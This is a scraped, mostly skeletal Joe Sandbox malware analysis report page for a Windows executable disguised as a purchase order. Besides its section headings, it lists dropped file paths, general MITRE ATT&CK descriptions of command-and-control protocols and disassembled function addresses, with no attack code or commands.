Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\7454168B

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt4ezjzt.bti.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sixvkcea.rxc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjlksn2r.tgk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpimaqpi.vkv.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Function 00D8D858 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Function 06C35C9C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246
processCOMMON

Function 06C35CA8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Function 04E721C5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118
COMMON

Function 04E721D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Function 00D8B5BF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226
COMMON

Function 04E70684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Function 00D84524 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Function 00D85D0D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Function 06C35A1A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre